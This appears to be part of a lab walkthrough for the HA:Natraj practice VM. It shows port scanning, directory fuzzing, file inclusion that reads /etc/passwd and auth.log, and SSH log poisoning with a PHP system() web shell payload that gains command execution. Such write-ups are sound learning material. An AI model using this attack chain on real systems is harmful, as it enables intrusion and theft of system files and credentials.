PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d9:9f:da:f4:2e:67:01:92:d5:da:7f:70:d0:06:b3:92 (RSA)
| 256 bc:ea:f1:3b:fa:7c:05:0c:92:95:92:e9:e7:d2:07:71 (ECDSA)
|_ 256 f0:24:5b:7a:3b:d6:b7:94:c4:4b:fe:57:21:f8:00:61 (ED25519)
80/tcp open tcpwrapped
|_http-title: HA:Natraj
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.125.80 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.hta (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/console (Status: 301) [Size: 318] [--> <http://192.168.125.80/console/>]
/images (Status: 301) [Size: 317] [--> <http://192.168.125.80/images/>]
/index.html (Status: 200) [Size: 14497]
/server-status (Status: 403) [Size: 279]
The /console caught my attention, so I will do a quick fuzz there on the parameter
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster fuzz -u <http://192.168.125.80/console/file.php?FUZZ=/etc/passwd> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -q -t 200 --exclude-length 0
Found: [Status=200] [Length=1398] <http://192.168.125.80/console/file.php?file=/etc/passwd>
Bingo
As we have the user mahakal and natraj let’s check if he has any .ssh key, but no luck.
And thinking back it is a Apache Server, perhaps we an check /var/log/auth.log?
<http://192.168.125.80/console/file.php?file=/var/log/auth.log>
And Yes we have access to this /var/log/auth.log
We tried to perform an RCE (Remote Command Execution) SSH Log Poisoning attack
┌──(kali㉿VirtualBox)-[~]
└─$ ssh '<?php system($_GET['cmd']); ?>'@192.168.125.80
ssh '<?php system($_GET['cmd']); ?>'@192.168.125.80
Then back to the URL, we can do &cmd=id at the end to check if we succeed
<http://192.168.125.80/console/file.php?file=/var/log/auth.log&cmd=id>
Seems like we did it
